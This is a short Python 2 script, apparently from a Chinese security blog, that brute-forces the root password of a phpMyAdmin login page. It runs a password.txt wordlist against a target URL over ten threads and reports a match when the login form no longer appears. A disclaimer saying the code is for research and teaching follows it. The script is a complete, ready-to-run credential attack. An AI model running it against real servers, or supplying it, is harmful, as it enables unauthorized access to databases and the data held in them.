#!/usr/bin/env python # -*- coding: utf-8 -*- # @Author: IcySun # 脚本功能:暴力破解phpMyadmin密码 from Queue import Queue import threading,sys import requests def use(): print '#' * 50 print '/t Crack Phpmyadmin root/'s pass' print '/t/t/t Code By: IcySun' print '/t python crackPhpmyadmin.py http://xx.com/phpmyadmin/ /n/t (default user is root)' print '#' * 50 def crack(password): global url payload = {'pma_username': 'root', 'pma_password': password} headers = {'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64)'} r = requests.post(url, headers = headers, data = payload) if 'name="login_form"' not in r.content: print '[*] OK! Have Got The Pass ==> %s' % password class MyThread(threading.Thread): def __init__(self): threading.Thread.__init__(self) def run(self): global queue while not queue.empty(): password = queue.get() crack(password) def main(): global url,password,queue queue = Queue() url = sys.argv[1] passlist = open('password.txt','r') for password in passlist.readlines(): password = password.strip() queue.put(password) for i in range(10): c = MyThread() c.start() if __name__ == '__main__': if len(sys.argv) != 2 : use() else: main()
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论